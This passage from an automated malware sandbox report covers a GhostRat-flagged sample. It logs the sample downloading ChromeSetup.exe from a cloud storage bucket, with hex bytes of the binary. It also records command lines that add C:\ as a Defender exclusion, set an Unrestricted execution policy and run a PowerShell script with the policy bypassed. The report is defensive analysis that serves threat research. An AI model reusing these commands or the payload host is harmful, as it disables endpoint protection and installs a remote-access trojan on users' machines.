                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 10, 2025 07:52:07.235974073 CET6511253192.168.2.91.1.1.1
                                                                                                Jan 10, 2025 07:52:07.287940025 CET53651121.1.1.1192.168.2.9

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Jan 10, 2025 07:52:07.235974073 CET192.168.2.91.1.1.10xe6c6Standard query (0)jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.comA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Jan 10, 2025 07:52:07.287940025 CET1.1.1.1192.168.2.90xe6c6No error (0)jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com47.79.66.76A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com

                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.94975147.79.66.764437528C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-10 06:52:08 UTC146OUTGET /ChromeSetup.exe HTTP/1.1
                                                                                                User-Agent: URLDownloader
                                                                                                Host: jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com
                                                                                                Cache-Control: no-cache
                                                                                                2025-01-10 06:52:09 UTC561INHTTP/1.1 200 OK
                                                                                                Server: AliyunOSS
                                                                                                Date: Fri, 10 Jan 2025 06:52:08 GMT
                                                                                                Content-Type: application/octet-stream
                                                                                                Content-Length: 10384768
                                                                                                Connection: close
                                                                                                x-oss-request-id: 6780C3980902553730FF7912
                                                                                                Accept-Ranges: bytes
                                                                                                ETag: "8C6E8B9F0955CB1ACD92C7C43A8899ED"
                                                                                                Last-Modified: Sat, 28 Dec 2024 13:04:37 GMT
                                                                                                x-oss-object-type: Normal
                                                                                                x-oss-hash-crc64ecma: 590259998580795227
                                                                                                x-oss-storage-class: Standard
                                                                                                x-oss-ec: 0048-00000113
                                                                                                Content-Disposition: attachment
                                                                                                x-oss-force-download: true
                                                                                                Content-MD5: jG6LnwlVyxrNksfEOoiZ7Q==
                                                                                                x-oss-server-time: 3
                                                                                                2025-01-10 06:52:09 UTC15823INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 7b 2a 32 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 54 34 00 00 d2 69 00 00 00 00 00 e0 e4 1b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 f0 9f 00 00 04 00 00 f6 f7 9e 00 02 00 40 c1 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 3c bc 3d 00 55 00 00 00 94 bc 3d 00 40 01 00
                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL{*2g"T4i@@<=U=@
                                                                                                2025-01-10 06:52:09 UTC16384INData Raw: 90 1b 44 95 00 89 04 97 49 8b 44 96 04 8d 52 01 0f 8d eb ff ff ff 83 d8 00 ba ff ff ff ff 31 c2 e9 0c 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 8b 74 9c 20 8b 2c 9f 89 4c 9c 20 21 c6 21 d5 09 f5 89 2c 9f 4b 0f 8d e5 ff ff ff 8b 64 24 18 b8 01 00 00 00 5f 5e 5b 5d c3 4d 6f 6e 74 67 6f 6d 65 72 79 20 4d 75 6c 74 69 70 6c 69 63 61 74 69 6f 6e 20 66 6f 72 20 78 38 36 2c 20 43 52 59 50 54 4f 47 41 4d 53 20 62 79 20 3c 61 70 70 72 6f 40 6f 70 65 6e 73 73 6c 2e 6f 72 67 3e 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 0c 57 8b 7c 24 14 55 53 31 db 8b 06 31 c9 8b 17 31 ed f7 e2 01 c3 8b 44 24 14 11 d1 8b 17 83 d5 00 89 18 8b 46 04 31 db f7 e2 01 c1 8b 06 11 d5 8b 57 04 83 d3 00 f7 e2 01 c1 8b 44 24 14 11 d5 8b 17 83 d3 00 89 48 04 8b 46
                                                                                                Data Ascii: DIDR1t ,L !!,Kd$_^[]Montgomery Multiplication for x86, CRYPTOGAMS by <appro@openssl.org>Vt$W|$US111D$F1WD$HF
                                                                                                2025-01-10 06:52:09 UTC16384INData Raw: 5c 24 24 31 fd 89 ce 0f a4 c9 05 01 eb 31 fe 0f ac d2 07 01 cb 03 44 24 28 31 d6 89 dd 0f a4 db 05 01 f0 31 d5 0f ac c9 07 01 d8 03 7c 24 2c 31 cd 89 c6 0f a4 c0 05 01 ef 31 ce 0f ac db 07 01 c7 03 54 24 30 31 de 89 fd 0f a4 ff 05 01 f2 31 dd 0f ac c0 07 01 fa 03 4c 24 34 31 c5 89 d6 0f a4 d2 05 01 e9 31 c6 0f ac ff 07 01 d1 03 5c 24 38 31 fe 89 cd 0f a4 c9 05 01 f3 31 fd 0f ac d2 07 01 cb 03 44 24 3c 31 d5 89 de 0f a4 db 05 01 e8 0f ac c9 07 01 d8 c5 fc 77 8b ac 24 c0 00 00 00 03 45 00 8b a4 24 cc 00 00 00 03 75 04 03 4d 08 89 45 00 03 55 0c 89 75 04 03 7d 10 89 4d 08 89 55 0c 89 7d 10 5f 5e 5b 5d c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 99 79 82 5a 99 79 82 5a 99 79 82 5a 99 79
                                                                                                Data Ascii: \$$11D$(11|$,11T$011L$411\$811D$<1w$E$uMEUu}MU}_^[]yZyZyZy
                                                                                                2025-01-10 06:52:09 UTC16384INData Raw: 54 24 14 01 cb 89 d1 0f ac d2 0e 8b 74 24 18 31 ca 8b 7c 24 1c 31 fe 0f ac d2 05 21 ce 89 4c 24 14 31 ca 31 f7 0f ac d2 06 89 d9 01 fa 8b 7c 24 08 89 de 0f ac c9 09 89 5c 24 04 31 d9 31 fb 03 14 24 0f ac c9 0b 21 d8 31 f1 03 54 24 3c 31 f8 0f ac c9 02 01 d0 03 54 24 10 01 c8 89 d1 0f ac d2 0e 8b 74 24 14 31 ca 8b 7c 24 18 31 fe 0f ac d2 05 21 ce 89 4c 24 10 31 ca 31 f7 0f ac d2 06 89 c1 01 fa 8b 7c 24 04 89 c6 0f ac c9 09 89 04 24 31 c1 31 f8 03 54 24 1c 0f ac c9 0b 21 c3 31 f1 03 54 24 40 31 fb 0f ac c9 02 01 d3 03 54 24 0c 01 cb 89 d1 0f ac d2 0e 8b 74 24 10 31 ca 8b 7c 24 14 31 fe 0f ac d2 05 21 ce 89 4c 24 0c 31 ca 31 f7 0f ac d2 06 89 d9 01 fa 8b 3c 24 89 de 0f ac c9 09 89 5c 24 1c 31 d9 31 fb 03 54 24 18 0f ac c9 0b 21 d8 31 f1 03 54 24 44 31 f8 0f
                                                                                                Data Ascii: T$t$1|$1!L$11|$\$11$!1T$<1T$t$1|$1!L$11|$$11T$!1T$@1T$t$1|$1!L$11<$\$11T$!1T$D1
                                                                                                2025-01-10 06:52:09 UTC16384INData Raw: cc 55 89 e5 31 c0 5d c3 cc cc cc cc cc cc cc cc cc 55 89 e5 57 56 89 ce 8b 01 8b 78 20 89 f9 ff 15 90 bb 7d 00 89 f1 ff d7 83 f8 ff 75 07 31 c0 48 5e 5f 5d c3 8b 46 0c 8d 48 01 89 4e 0c 0f b6 00 eb ee cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 1c 89 c8 8d 55 e8 89 62 fc c7 42 08 ff ff ff ff c7 42 04 60 20 41 00 64 8b 0d 00 00 00 00 89 0a 64 89 15 00 00 00 00 8b 08 8b 49 04 83 7c 08 18 00 74 62 c7 45 d8 ff ff ff ff c6 45 d8 00 89 45 dc 89 45 e0 83 7c 08 10 00 75 3f 8b 45 e0 8b 4c 08 48 85 c9 75 76 c6 45 d8 01 8b 4d e0 8b 01 8b 40 04 8b 74 01 18 8b 06 8b 78 14 c7 45 f0 ff ff ff ff 89 f9 ff 15 90 bb 7d 00 c7 45 f0 01 00 00 00 89 f1 ff d7 83 f8 ff 74 1d 8d 4d d8 e8 06 f1 1d 00 8b 45 e0 8b
                                                                                                Data Ascii: U1]UWVx }u1H^_]FHNU]USWVUbBB` AddI|tbEEEE|u?ELHuvEM@txE}EtME
                                                                                                2025-01-10 06:52:09 UTC16384INData Raw: 8d 75 c8 56 e8 b8 3c 13 00 83 c4 10 8b 45 ec 8b 4d e4 50 51 68 a4 67 75 00 56 e8 72 39 08 00 83 c4 10 8b 75 d8 85 f6 8d 5d 08 75 47 8d 4d e8 eb 22 8b 3b 85 ff 74 7e 8d 75 c8 89 3e c7 03 00 00 00 00 8b 4f 04 ff 15 90 bb 7d 00 57 ff d1 83 c4 04 89 f1 e8 d9 3d 13 00 89 d9 e8 d2 3d 13 00 8b 4d f0 31 e9 e8 fe 93 1a 00 83 c4 30 5e 5f 5b 5d c2 04 00 8b 7d dc 89 f0 39 fe 74 23 83 c7 f4 85 ff 74 2d 80 7f 0b 00 79 0a ff 37 e8 e1 80 1a 00 83 c4 04 8d 47 f4 39 f7 89 c7 75 e3 8b 45 d8 89 75 dc 50 e8 c9 80 1a 00 83 c4 04 e9 7c ff ff ff 0f 0b cc 0f 0b cc 0f 0b cc 0f 0b cc 0f 0b cc cc cc 55 89 e5 53 57 56 81 ec b8 02 00 00 89 ce a1 40 20 7e 00 31 e8 89 45 f0 8d bd 88 fe ff ff 68 20 01 00 00 68 ff 00 00 00 57 e8 22 c3 1a 00 83 c4 0c 8b 4e 0c 57 e8 c6 e0 00 00 80 bf 1c 01
                                                                                                Data Ascii: uV<EMPQhguVr9u]uGM";t~u>O}W==M10^_[]}9t#t-y7G9uEuP|USWV@ ~1Eh hW"NW
                                                                                                2025-01-10 06:52:09 UTC16384INData Raw: 00 8d bd 2c ff ff ff 89 f1 89 de 57 e8 d0 bc 0b 00 8d 85 44 ff ff ff 50 8d 85 50 ff ff ff 50 57 8d 45 10 ff 30 8d 45 18 ff 30 53 e8 21 27 00 00 83 c4 18 80 7f 0b 00 79 0e ff b5 2c ff ff ff e8 2d 41 1a 00 83 c4 04 80 bd 5b ff ff ff 00 79 0e ff b5 50 ff ff ff e8 16 41 1a 00 83 c4 04 8b bd 38 ff ff ff 8b 9d 3c ff ff ff 6a 34 68 36 6a 75 00 e8 9b f5 12 00 83 c4 08 39 df 0f 84 87 00 00 00 85 c0 7e 63 8d bd 50 ff ff ff 89 f9 6a ff 68 5f 01 00 00 68 36 6a 75 00 e8 e3 4a 08 00 8d 85 58 ff ff ff 6a 24 68 f0 6f 75 00 50 e8 20 ec 0f 00 83 c4 0c 8b 8d 3c ff ff ff 2b 8d 38 ff ff ff c1 f9 03 69 d1 ab aa aa aa 89 c1 52 e8 10 de 0f 00 6a 0e 68 15 70 75 00 50 e8 f3 eb 0f 00 83 c4 0c 89 f9 e8 89 4f 08 00 8b 8d 24 ff ff ff 56 e8 fd be 0b 00 31 f6 84 c0 75 5f c7 45 14 09 00
                                                                                                Data Ascii: ,WDPPPWE0E0S!'y,-A[yPA8<j4h6ju9~cPjh_h6juJXj$houP <+8iRjhpuPO$V1u_E
                                                                                                2025-01-10 06:52:09 UTC16384INData Raw: ff ff 89 85 44 ff ff ff 39 f0 0f 85 9b 00 00 00 8b 8d 4c ff ff ff 89 f8 83 bd 48 ff ff ff 00 74 6a 8b 85 44 ff ff ff 8d 70 ff 8b 85 48 ff ff ff 48 89 85 34 ff ff ff 31 c0 8b 8d 4c ff ff ff 0f b6 0c 01 0f b6 1c 07 89 da 80 c2 bf 88 de 80 c6 20 80 fa 1a 0f b6 d6 0f 43 d3 89 cb 80 c3 bf 88 cf 80 c7 20 80 fb 1a 0f b6 df 0f 43 d9 38 da 75 3a 8d 48 01 39 c6 74 0a 39 85 34 ff ff ff 89 c8 75 b7 8d 04 0f 03 8d 4c ff ff ff 03 bd 44 ff ff ff 39 f8 75 16 8b 85 4c ff ff ff 03 85 48 ff ff ff b3 01 39 c1 0f 84 fc 00 00 00 6a 40 68 c8 71 75 00 e8 5a b5 12 00 83 c4 08 85 c0 0f 8e d9 00 00 00 8d 9d 50 ff ff ff 89 d9 6a ff 68 8f 01 00 00 68 c8 71 75 00 e8 a6 0a 08 00 8d 85 58 ff ff ff 6a 1d 68 c6 73 75 00 50 e8 e3 ab 0f 00 83 c4 0c 8b 95 3c ff ff ff 0f be 4a 23 85 c9 8b b5
                                                                                                Data Ascii: D9LHtjDpHH41L C C8u:H9t94uLD9uLH9j@hquZPjhhquXjhsuP<J#
                                                                                                2025-01-10 06:52:09 UTC16384INData Raw: cc 55 89 e5 53 57 56 83 ec 44 89 ce 8b 7d 0c a1 40 20 7e 00 31 e8 89 45 f0 89 f9 e8 61 3e 07 00 84 c0 0f 84 87 01 00 00 89 75 b0 8b 5e 10 8b 03 8b 70 50 89 f1 ff 15 90 bb 7d 00 89 d9 57 ff 75 08 ff d6 8d 5d d8 89 f9 53 e8 43 3e 07 00 0f be 43 0b 85 c0 79 06 8b 45 dc 8b 5d d8 8d 4d e4 50 53 51 e8 aa db 11 00 83 c4 0c 68 f4 12 76 00 e8 f1 74 1b 00 83 c4 04 3d f8 ff ff 7f 0f 83 30 01 00 00 89 c3 8d 45 cc 83 fb 04 0f 86 0e 01 00 00 89 df 83 cf 03 47 0f 88 0e 01 00 00 89 c6 8d 04 3f 50 e8 93 c0 19 00 83 c4 04 89 45 cc 81 cf 00 00 00 80 89 7d d4 89 5d d0 8d 3c 58 b9 f4 12 76 00 39 c8 0f 97 c2 39 cf 0f 96 c1 08 d1 0f 84 d5 00 00 00 85 db 74 11 01 db 53 68 f4 12 76 00 50 e8 ac fd 19 00 83 c4 0c 66 c7 07 00 00 8b 4d 08 0f be 41 0b 85 c0 79 05 8b 41 04 8b 09 8d 5d
                                                                                                Data Ascii: USWVD}@ ~1Ea>u^pP}Wu]SC>CyE]MPSQhvt=0EG?PE}]<Xv99tShvPfMAyA]
                                                                                                2025-01-10 06:52:09 UTC16384INData Raw: 2c 0f 00 83 c4 0c 89 f9 e8 64 90 07 00 e8 4f 80 11 00 8b 38 6a 1c e8 1f 81 19 00 83 c4 04 89 c3 89 c1 68 70 58 41 00 68 30 a4 41 00 68 d0 62 42 00 e8 0b 3d 12 00 8b 06 89 43 10 31 c9 80 7d 0c 00 ba 19 25 01 00 0f 44 d1 89 0e 89 53 14 89 4b 18 85 c0 0f 84 b3 01 00 00 89 9d 30 ff ff ff 8d 9d 4c ff ff ff 68 ac 00 00 00 68 22 7b 75 00 68 ba 7b 75 00 53 e8 47 3c 12 00 83 c4 10 8b 85 30 ff ff ff 89 f9 50 53 e8 55 7b 11 00 89 f1 e8 9e 3d 12 00 8b 4d f0 31 e9 e8 ca 93 19 00 81 c4 c8 00 00 00 5e 5f 5b 5d c2 0c 00 8b 87 90 00 00 00 89 85 2c ff ff ff 8d 85 4c ff ff ff 68 a7 00 00 00 68 22 7b 75 00 68 ba 7b 75 00 50 e8 f0 3b 12 00 83 c4 10 6a 18 e8 5f 80 19 00 83 c4 04 89 c3 89 c1 68 70 58 41 00 68 30 a4 41 00 68 40 62 42 00 e8 4b 3c 12 00 8b 06 89 43 10 31 c9 89 0e
                                                                                                Data Ascii: ,dO8jhpXAh0AhbB=C1}%DSK0Lhh"{uh{uSG<0PSU{=M1^_[],Lhh"{uh{uP;j_hpXAh0Ah@bBK<C1


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:01:52:00
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\FIWszl1A8l.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:3'213'672 bytes
                                                                                                MD5 hash:F1C0A349EF488C9D2FDE3DD7F3C497BD
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:2
                                                                                                Start time:01:52:02
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                                Imagebase:0xc50000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:01:52:02
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff70f010000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:4
                                                                                                Start time:01:52:03
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                                Imagebase:0x460000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:5
                                                                                                Start time:01:52:04
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                Imagebase:0x7ff72d8c0000
                                                                                                File size:496'640 bytes
                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:6
                                                                                                Start time:01:52:06
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Users\user\AppData\Roaming\FIWszl1A8l.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Roaming\FIWszl1A8l.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:3'213'672 bytes
                                                                                                MD5 hash:F1C0A349EF488C9D2FDE3DD7F3C497BD
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.2570644353.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3537866824.0000000004173000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.1775024265.0000000004111000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3791271776.0000000004310000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3789481950.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.2571249345.0000000003F9B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.1743428014.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.1775024265.0000000004142000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000003.2529901329.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3786854154.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 32%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:8
                                                                                                Start time:01:52:06
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                Imagebase:0xc50000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:9
                                                                                                Start time:01:52:06
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff70f010000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:10
                                                                                                Start time:01:52:06
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                Imagebase:0x460000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:11
                                                                                                Start time:01:52:08
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                                                                                                Imagebase:0xc50000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:12
                                                                                                Start time:01:52:08
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff70f010000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:13
                                                                                                Start time:01:52:08
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                                                                                                Imagebase:0x460000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:15
                                                                                                Start time:01:52:33
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                Imagebase:0xc50000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:16
                                                                                                Start time:01:52:33
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                Imagebase:0xc50000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:17
                                                                                                Start time:01:52:33
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff70f010000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:18
                                                                                                Start time:01:52:33
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff70f010000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:19
                                                                                                Start time:01:52:33
                                                                                                Start date:10/01/2025
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                Imagebase:0x460000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:20
                                                                                                Start time:01:52:33
                                                                                                Start date:10/01/2025
